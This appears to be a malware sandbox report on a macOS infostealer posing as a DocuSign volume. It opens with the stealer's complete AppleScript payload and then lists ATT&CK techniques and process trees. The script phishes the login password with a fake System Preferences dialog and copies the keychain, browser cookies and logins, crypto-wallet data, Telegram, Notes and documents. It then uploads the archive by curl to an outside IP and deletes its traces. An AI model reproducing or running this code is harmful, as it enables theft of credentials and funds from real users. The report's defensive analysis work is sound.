if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" '&"

osascript -e "set release to true set filegrabbers to true if release then try tell window 1 of application \"Terminal\" to set visible to false end try end if on filesizer(paths) set fsz to 0 try set theItem to quoted form of POSIX path of paths set fsz to (do shell script \"/usr/bin/mdls -name kMDItemFSSize -raw \" & theItem) end try return fsz end filesizer on mkdir(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) do shell script \"mkdir -p \" & filePosixPath end try end mkdir on FileName(filePath) try set reversedPath to (reverse of every character of filePath) as string set trimmedPath to text 1 thru ((offset of \"/\" in reversedPath) - 1) of reversedPath set finalPath to (reverse of every character of trimmedPath) as string return finalPath end try end FileName on BeforeFileName(filePath) try set lastSlash to offset of \"/\" in (reverse of every character of filePath) as string set trimmedPath to text 1 thru -(lastSlash + 1) of filePath return trimmedPath end try end BeforeFileName on writeText(textToWrite, filePath) try set folderPath to BeforeFileName(filePath) mkdir(folderPath) set fileRef to (open for access filePath with write permission) write textToWrite to fileRef starting at eof close access fileRef end try end writeText on readwrite(path_to_file, path_as_save) try set fileContent to read path_to_file set folderPath to BeforeFileName(path_as_save) mkdir(folderPath) do shell script \"cat \" & quoted form of path_to_file & \" > \" & quoted form of path_as_save end try end readwrite on readwrite2(path_to_file, path_as_save) try set folderPath to do shell script \"dirname \" & quoted form of path_as_save mkdir(folderPath) tell application \"Finder\" set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacing end tell end try end readwrite2 on isDirectory(someItem) try set filePosixPath to quoted form of (POSIX path of someItem) set fileType to (do shell script \"file -b \" & filePosixPath) if fileType ends with \"directory\" then return true end if return false end try end isDirectory on GrabFolderLimit(sourceFolder, destinationFolder) try set bankSize to 0 set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolderLimit(itemPath, savePath) else set fsz to filesizer(itemPath) set bankSize to bankSize + fsz if bankSize < 10 * 1024 * 1024 then readwrite(itemPath, savePath) end if end if end if end repeat end try end GrabFolderLimit on GrabFolder(sourceFolder, destinationFolder) try set exceptionsList to {\".DS_Store\", \"Partitions\", \"Code Cache\", \"Cache\", \"market-history-cache.json\", \"journals\", \"Previews\", \"dumps\", \"emoji\", \"user_data\", \"__update__\", \"user_data#2\", \"user_data#3\"} set fileList to list folder sourceFolder without invisibles mkdir(destinationFolder) repeat with currentItem in fileList if currentItem is not in exceptionsList then set itemPath to sourceFolder & \"/\" & currentItem set savePath to destinationFolder & \"/\" & currentItem if isDirectory(itemPath) then GrabFolder(itemPath, savePath) else readwrite(itemPath, savePath) end if end if end repeat end try end GrabFolder on parseFF(firefox, writemind) try set myFiles to {\"/cookies.sqlite\", \"/formhistory.sqlite\", \"/key4.db\", \"/logins.json\"} set fileList to list folder firefox without invisibles repeat with currentItem in fileList set fpath to writemind & \"ff/\" & currentItem set readpath to firefox & currentItem repeat with FFile in myFiles readwrite(readpath & FFile, fpath & FFile) end repeat end repeat end try end parseFF on checkvalid(username, password_entered) try set result to do shell script \"dscl . authonly \" & quoted form of username & space & quoted form of password_entered if result is not equal to \"\" then return false else return true end if on error return false end try end checkvalid on getpwd(username, writemind) try if checkvalid(username, \"\") then set result to do shell script \"security 2>&1 > /dev/null find-generic-password -ga \\\"Chrome\\\" | awk \\\"{print \$2}\\\"\" writeText(result as string, writemind & \"masterpass-chrome\") else repeat set result to display dialog \"Required Application Helper.\\nPlease enter password for continue.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"System Preferences\" with hidden answer set password_entered to text returned of result if checkvalid(username, password_entered) then writeText(password_entered, writemind & \"pwd\") return password_entered end if end repeat end if end try return \"\" end getpwd on grabPlugins(paths, savePath, pluginList, index) try set fileList to list folder paths without invisibles repeat with PFile in fileList repeat with Plugin in pluginList if (PFile contains Plugin) then set newpath to paths & PFile set newsavepath to savePath & \"/\" & Plugin if index then set newsavepath to newsavepath & \"/IndexedDB/\" end if GrabFolder(newpath, newsavepath) end if end repeat end repeat end try end grabPlugins on chromium(writemind, chromium_map) set pluginList to {\"keenhcnmdmjjhincpilijphpiohdppno\", \"hbbgbephgojikajhfbomhlmmollphcad\", \"cjmkndjhnagcfbpiemnkdpomccnjblmj\", \"dhgnlgphgchebgoemcjekedjjbifijid\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"kamfleanhcmjelnhaeljonilnmjpkcjc\", \"jnldfbidonfeldmalbflbmlebbipcnle\", \"fdcnegogpncmfejlfnffnofpngdiejii\", \"klnaejjgbibmhlephnhpmaofohgkpgkd\", \"pdadjkfkgcafgbceimcpbkalnfnepbnk\", \"kjjebdkfeagdoogagbhepmbimaphnfln\", \"ldinpeekobnhjjdofggfgjlcehhmanlj\", \"dkdedlpgdmmkkfjabffeganieamfklkm\", \"bcopgchhojmggmffilplmbdicgaihlkp\", \"kpfchfdkjhcoekhdldggegebfakaaiog\", \"idnnbdplmphpflfnlkomgpfbpcgelopg\", \"mlhakagmgkmonhdonhkpjeebfphligng\", \"bipdhagncpgaccgdbddmbpcabgjikfkn\", \"gcbjmdjijjpffkpbgdkaojpmaninaion\", \"nhnkbkgjikgcigadomkphalanndcapjk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"hoighigmnhgkkdaenafgnefkcmipfjon\", \"klghhnkeealcohjjanjjdaeeggmfmlpl\", \"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"ebfidpplhabeedpnhjnobghokpiioolj\", \"emeeapjkbcbpbpgaagfchmcgglmebnen\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"fhilaheimglignddkjgofkcbgekhenbh\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"cihmoadaighcejopammfbmddcmdekcje\", \"lodccjjbdhfakaekdiahmedfbieldgik\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"cjelfplplebdjjenllpjcblmjkfcffne\", \"jnlgamecbpmbajjfhmmmlhejkemejdma\", \"fpkhgmpbidmiogeglndfbkegfdlnajnf\", \"bifidjkcdpgfnlbcjpdkdcnbiooooblg\", \"amkmjjmmflddogmhpjloimipbofnfjih\", \"flpiciilemghbmfalicajoolhkkenfel\", \"hcflpincpppdclinealmandijcmnkbgn\", \"aeachknmefphepccionboohckonoeemg\", \"nlobpakggmbcgdbpjpnagmdbdhdhgphk\", \"momakdpclmaphlamgjcndbgfckjfpemp\", \"mnfifefkajgofkcjkemidiaecocnkjeh\", \"fnnegphlobjdpkhecapkijjdkgcjhkib\", \"ehjiblpccbknkgimiflboggcffmpphhp\", \"ilhaljfiglknggcoegeknjghdgampffk\", \"pgiaagfkgcbnmiiolekcfmljdagdhlcm\", \"fnjhmkhhmkbjkkabndcnnogagogbneec\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"imlcamfeniaidioeflifonfjeeppblda\", \"mdjmfdffdcmnoblignmgpommbefadffd\", \"ooiepdgjjnhcmlaobfinbomgebfgablh\", \"pcndjhkinnkaohffealmlmhaepkpmgkb\", \"ppdadbejkmjnefldpcdjhnkpbjkikoip\", \"cgeeodpfagjceefieflmdfphplkenlfk\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"bocpokimicclpaiekenaeelehdjllofo\", \"pocmplpaccanhmnllbbkpgfliimjljgo\", \"cphhlgmgameodnhkjdmkpanlelnlohao\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"bopcbmipnjdcdfflfgjdgdjejmgpoaab\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"phkbamefinggmakgklpkljjmgibohnba\", \"epapihdplajcdnnkdeiahlgigofloibg\", \"hpclkefagolihohboafpheddmmgdffjm\", \"cjookpbkjnpkmknedggeecikaponcalb\", \"cpmkedoipcpimgecpmgpldfpohjplkpp\", \"modjfdjcodmehnpccdjngmdfajggaoeh\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"kncchdigobghenbbaddojjnnaogfppfj\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"mcbigmjiafegjnnogedioegffbooigli\", \"fccgmnglbhajioalokbcidhcaikhlcpm\", \"hnhobjmcibchnmglfbldbfabcgaknlkj\", \"apnehcjmnengpnmccpaibjmhhoadaico\", \"enabgbdfcbaehmbigakijjabdpdnimlg\", \"mgffkfbidihjpoaomajlbgchddlicgpn\", \"fopmedgnkfpebgllppeddmmochcookhc\", \"jojhfeoedkpkglbfimdfabpdfjaoolaf\", \"ammjlinfekkoockogfhdkgcohjlbhmff\", \"abkahkcbhngaebpcgfmhkoioedceoigp\", \"dcbjpgbkjoomeenajdabiicabjljlnfp\", \"gkeelndblnomfmjnophbhfhcjbcnemka\", \"pnndplcbkakcplkjnolgbkdgjikjednm\", \"copjnifcecdedocejpaapepagaodgpbh\", \"hgbeiipamcgbdjhfflifkgehomnmglgk\", \"mkchoaaiifodcflmbaphdgeidocajadp\", \"ellkdbaphhldpeajbepobaecooaoafpg\", \"mdnaglckomeedfbogeajfajofmfgpoae\", \"nknhiehlklippafakaeklbeglecifhad\", \"ckklhkaabbmdjkahiaaplikpdddkenic\", \"fmblappgoiilbgafhjklehhfifbdocee\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"cnmamaachppnkjgnildpdmkaakejnhae\", \"fijngjgcjhjmmpcmkeiomlglpeiijkld\", \"niiaamnmgebpeejeemoifgdndgeaekhe\", \"odpnjmimokcmjgojhnhfcnalnegdjmdn\", \"lbjapbcmmceacocpimbpbidpgmlmoaao\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"hpglfhgfnhbgpjdenjgmdgoeiappafln\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"ibljocddagjghmlpgihahamcghfggcjc\", \"gkodhkbmiflnmkipcmlhhgadebbeijhh\", \"dbgnhckhnppddckangcjbkjnlddbjkna\", \"mfhbebgoclkghebffdldpobeajmbecfk\", \"nlbmnnijcnlegkjjpcfjclmcfggfefdm\", \"nlgbhdfgdhgbiamfdfmbikcdghidoadd\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"agoakfejjabomempkjlepdflaleeobhb\", \"dgiehkgfknklegdhekgeabnhgfjhbajd\", \"onhogfjeacnfoofkfgppdlbmlmnplgbn\", \"kkpehldckknjffeakihjajcjccmcjflh\", \"jaooiolkmfcmloonphpiiogkfckgciom\", \"ojggmchlghnjlapmfbnjholfjkiidbch\", \"pmmnimefaichbcnbndcfpaagbepnjaig\", \"oiohdnannmknmdlddkdejbmplhbdcbee\", \"aiifbnbfobpmeekipheeijimdpnlpgpp\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"anokgmphncpekkhclmingpimjmcooifb\", \"kkpllkodjeloidieedojogacfhpaihoh\", \"iokeahhehimjnekafflcihljlcjccdbe\", \"ifckdpamphokdglkkdomedpdegcjhjdp\", \"loinekcabhlmhjjbocijdoimmejangoa\", \"fcfcfllfndlomdhbehjjcoimbgofdncg\", \"ifclboecfhkjbpmhgehodcjpciihhmif\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"ookjlbkiijinhpmnjffcofjonbfbgaoc\", \"oafedfoadhdjjcipmcbecikgokpaphjk\", \"mapbhaebnddapnmifbbkgeedkeplgjmf\", \"cmndjbecilbocjfkibfbifhngkdmjgog\", \"kpfopkelmapcoipemfendmdcghnegimn\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\", \"ffnbelfdoeiohenkjibnmadjiehjhajb\", \"opcgpfmipidbgpenhmajoajpbobppdil\", \"lakggbcodlaclcbbbepmkpdhbcomcgkd\", \"kgdijkcfiglijhaglibaidbipiejjfdp\", \"hdkobeeifhdplocklknbnejdelgagbao\", \"lnnnmfcpbkafcpgdilckhmhbkkbpkmid\", \"nbdhibgjnjpnkajaghbffjbkcgljfgdi\", \"kmhcihpebfmpgmihbkipmjlmmioameka\", \"kmphdnilpmdejikjdnlbcnmnabepfgkh\", \"nngceckbapebfimnlniiiahkandclblb\"} set chromiumFiles to {\"/Network/Cookies\", \"/Cookies\", \"/Web Data\", \"/Login Data\", \"/Local Extension Settings/\", \"/IndexedDB/\"} repeat with chromium in chromium_map set savePath to writemind & \"Chromium/\" & item 1 of chromium & \"_\" try set fileList to list folder item 2 of chromium without invisibles repeat with currentItem in fileList if ((currentItem as string) is equal to \"Default\") or ((currentItem as string) contains \"Profile\") then repeat with CFile in chromiumFiles set readpath to (item 2 of chromium & currentItem & CFile) if ((CFile as string) is equal to \"/Network/Cookies\") then set CFile to \"/Cookies\" end if if ((CFile as string) is equal to \"/Local Extension Settings/\") then grabPlugins(readpath, savePath & currentItem, pluginList, false) else if (CFile as string) is equal to \"/IndexedDB/\" then grabPlugins(readpath, savePath & currentItem, pluginList, true) else set writepath to savePath & currentItem & CFile readwrite(readpath, writepath) end if end repeat end if end repeat end try end repeat end chromium on telegram(writemind, library) try GrabFolder(library & \"Telegram Desktop/tdata/\", writemind & \"Telegram Data/\") end try end telegram on deskwallets(writemind, deskwals) repeat with deskwal in deskwals try GrabFolder(item 2 of deskwal, writemind & item 1 of deskwal) end try end repeat end deskwallets on filegrabber(writemind) try set destinationFolderPath to POSIX file (writemind & \"FileGrabber/\") mkdir(destinationFolderPath) set photosPath to POSIX file (writemind & \"FileGrabber/NotesFiles/\") mkdir(photosPath) set extensionsList to {\"txt\", \"pdf\", \"docx\", \"wallet\", \"key\", \"keys\", \"doc\"} set bankSize to 0 tell application \"Finder\" try set safariFolderPath to (path to home folder as text) & \"Library:Cookies:\" duplicate file (safariFolderPath & \"Cookies.binarycookies\") to folder destinationFolderPath with replacing set name of result to \"saf1\" end try try set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") try duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder destinationFolderPath with replacing end try set notesFolderPath to (path to home folder as text) & \"Library:Group Containers:group.com.apple.notes:\" set notesAccounts to folder (notesFolderPath & \"Accounts:LocalAccount:Media\") duplicate notesAccounts to photosPath with replacing duplicate notesAccounts to POSIX file photosPath as alias with replacing set notesFolder to folder notesFolderPath set notesFiles to {\"NoteStore.sqlite\", \"NoteStore.sqlite-shm\", \"NoteStore.sqlite-wal\"} repeat with fileName in notesFiles set sourceFile to file fileName of notesFolder duplicate sourceFile to POSIX file destinationFolderPath as alias with replacing end repeat end try try set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set downloadsFiles to every file of folder \"Downloads\" of (path to home folder) repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set filesize to size of aFile if filesize < 3 * 1024 * 1024 then if (bankSize + filesize) < 30 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + filesize end try else exit repeat end if end if end if end repeat end try end tell end try end filegrabber on send_data(attempt) try set result_send to (do shell script \"curl -X POST -H \\\"user: U86a4irDPnx0tAJz7TLOjLJYmAQVbgSjU5qs/B5Ew50=\\\" -H \\\"BuildID: xfSjtQhSzYb0Vrl3d-Yt-dadILWIh9rw4YAjC3vFKmI=\\\" -H \\\"cl: 0\\\" -H \\\"cn: 0\\\" --max-time 300 -retry 5 -retry-delay 10 -F \\\"file=@/tmp/out.zip\\\" http://141.98.9.20/joinsystem\") on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end try end send_data set username to (system attribute \"USER\") set profile to \"/Users/\" & username set randomNumber to do shell script \"echo \$((RANDOM % 9000 + 1000))\" set writemind to \"/tmp/\" & randomNumber & \"/\" try set result to (do shell script \"system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType\") writeText(result, writemind & \"info\") end try set library to profile & \"/Library/Application Support/\" set password_entered to getpwd(username, writemind) delay 0.01 set chromiumMap to {{\"Chrome\", library & \"Google/Chrome/\"}, {\"Brave\", library & \"BraveSoftware/Brave-Browser/\"}, {\"Edge\", library & \"Microsoft Edge/\"}, {\"Vivaldi\", library & \"Vivaldi/\"}, {\"Opera\", library & \"com.operasoftware.Opera/\"}, {\"OperaGX\", library & \"com.operasoftware.OperaGX/\"}, {\"Chrome Beta\", library & \"Google/Chrome Beta/\"}, {\"Chrome Canary\", library & \"Google/Chrome Canary\"}, {\"Chromium\", library & \"Chromium/\"}, {\"Chrome Dev\", library & \"Google/Chrome Dev/\"}, {\"Arc\", library & \"Arc/\"}, {\"Coccoc\", library & \"Coccoc/\"}} set walletMap to {{\"deskwallets/Electrum\", profile & \"/.electrum/wallets/\"}, {\"deskwallets/Coinomi\", library & \"Coinomi/wallets/\"}, {\"deskwallets/Exodus\", library & \"Exodus/\"}, {\"deskwallets/Atomic\", library & \"atomic/Local Storage/leveldb/\"}, {\"deskwallets/Wasabi\", profile & \"/.walletwasabi/client/Wallets/\"}, {\"deskwallets/Ledger_Live\", library & \"Ledger Live/\"}, {\"deskwallets/Monero\", profile & \"/Monero/wallets/\"}, {\"deskwallets/Bitcoin_Core\", library & \"Bitcoin/wallets/\"}, {\"deskwallets/Litecoin_Core\", library & \"Litecoin/wallets/\"}, {\"deskwallets/Dash_Core\", library & \"DashCore/wallets/\"}, {\"deskwallets/Electrum_LTC\", profile & \"/.electrum-ltc/wallets/\"}, {\"deskwallets/Electron_Cash\", profile & \"/.electron-cash/wallets/\"}, {\"deskwallets/Guarda\", library & \"Guarda/\"}, {\"deskwallets/Dogecoin_Core\", library & \"Dogecoin/wallets/\"}, {\"deskwallets/Trezor_Suite\", library & \"@trezor/suite-desktop/\"}} readwrite(library & \"Binance/app-store.json\", writemind & \"deskwallets/Binance/app-store.json\") readwrite(library & \"@tonkeeper/desktop/config.json\", \"deskwallets/TonKeeper/config.json\") readwrite(profile & \"/Library/Keychains/login.keychain-db\", writemind & \"keychain\") if release then readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite\", writemind & \"FileGrabber/NoteStore.sqlite\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal\", writemind & \"FileGrabber/NoteStore.sqlite-wal\") readwrite2(profile & \"/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm\", writemind & \"FileGrabber/NoteStore.sqlite-shm\") readwrite2(profile & \"/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/Cookies.binarycookies\") readwrite(profile & \"/Library/Cookies/Cookies.binarycookies\", writemind & \"FileGrabber/saf1\") end if if filegrabbers then filegrabber(writemind) end if writeText(username, writemind & \"username\") set ff_paths to {library & \"Firefox/Profiles/\", library & \"Waterfox/Profiles/\", library & \"Pale Moon/Profiles/\"} repeat with firefox in ff_paths try parseFF(firefox, writemind) end try end repeat chromium(writemind, chromiumMap) deskwallets(writemind, walletMap) telegram(writemind, library) do shell script \"ditto -c -k --sequesterRsrc \" & writemind & \" /tmp/out.zip\" send_data(0) do shell script \"rm -r \" & writemind do shell script \"rm /tmp/out.zip\" "

File Permission 1 TTPs
Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.
evasion

Linux and Mac File and Directory Permissions Modification
T1222.002
Gatekeeper Bypass 1 TTPs
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apples security model to ensure only trusted applications are executed on a host.
evasion

Gatekeeper Bypass
T1553.001
File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur.
evasion

File Deletion
T1070.004

File and Directory Discovery. 1 TTPs 8 IoCs

Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.

discovery

File and Directory Discovery

T1083

Processes:

ioc	process
dirname /tmp/1458/FileGrabber/NoteStore.sqlite
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-wal'"
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-wal
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite-shm'"
dirname /tmp/1458/FileGrabber/NoteStore.sqlite-shm
sh -c "dirname '/tmp/1458/FileGrabber/Cookies.binarycookies'"
dirname /tmp/1458/FileGrabber/Cookies.binarycookies
sh -c "dirname '/tmp/1458/FileGrabber/NoteStore.sqlite'"

Resource Forking 1 TTPs 14 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

Processes:

ioc	process
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 2 -isForBrowser -prefsLen 28106 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3d9c3f77-c95f-406a-9d52-4433bfd7fb0a}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.31092608 tab
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 4 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{771f4a74-9263-4824-a798-ad64b6fd6ee7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.364094713 tab
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -prefsLen 24681 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{043313b5-d3ab-412d-baed-99c39897ceb0}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1101942401 socket
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 1 -isForBrowser -prefsLen 24745 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{0b69578d-0792-4618-a4ac-b744b3ea123f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.292495982 tab
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 6 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{bbd3149c-5dca-4e6c-9a9f-b5c1657ab0e9}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1368739078 tab
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 7 -isForBrowser -prefsLen 28250 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{2fe96c36-67a0-42d6-8e9c-e781c2378125}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1421779236 tab
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 3 -isForBrowser -prefsLen 30477 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{3df60387-2707-41c3-820b-7c30e1305e2f}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1016985583 tab
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -childID 5 -isForBrowser -prefsLen 28213 -prefMapSize 248244 -jsInitLen 234780 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -sbLevel 3 -parentBuildID 20240628091536 -greomni "/Applications/Firefox Developer Edition.app/Contents/Resources/omni.ja" -appomni "/Applications/Firefox Developer Edition.app/Contents/Resources/browser/omni.ja" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{eb4a3a7f-dfca-4adb-ae42-eb5147346cb7}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.480578065 tab
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper
"/Applications/Firefox Developer Edition.app/Contents/MacOS/plugin-container.app/Contents/MacOS/plugin-container" -parentBuildID 20240628091536 -sandboxingKind 0 -prefsLen 30477 -prefMapSize 248244 -sbStartup -sbAppPath "/Applications/Firefox Developer Edition.app" -appDir "/Applications/Firefox Developer Edition.app/Contents/Resources/browser" -profile "/Users/run/Library/Application Support/Firefox/Profiles/2mzklot7.dev-edition-default" "{daf1cbd7-884b-41c7-a051-2be6288a63dc}" 588 gecko-crash-server-pipe.588 org.mozilla.machname.1185368082 utility

Command and Scripting Interpreter 1 TTPs
Adversaries may abuse Unix shell commands and scripts for execution.
execution

Unix Shell
T1059.004

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/DocuSignWITWB\""
1⤵
PID:495

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/DocuSignWITWB\""
1⤵
PID:495

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/DocuSignWITWB"
1⤵
PID:495
- /bin/zsh
  /bin/zsh -c "open /Volumes/DocuSignWITWB"
  2⤵
  PID:497
- /usr/bin/open
  open /Volumes/DocuSignWITWB
  2⤵
  PID:497

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:500

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:500

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:501

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:501

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:502

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged --privileged
1⤵
PID:502

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.2100
1⤵
PID:510

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:510
- /usr/bin/login
  login -pf run
  2⤵
  PID:511
- - /bin/zsh
    -zsh
    3⤵
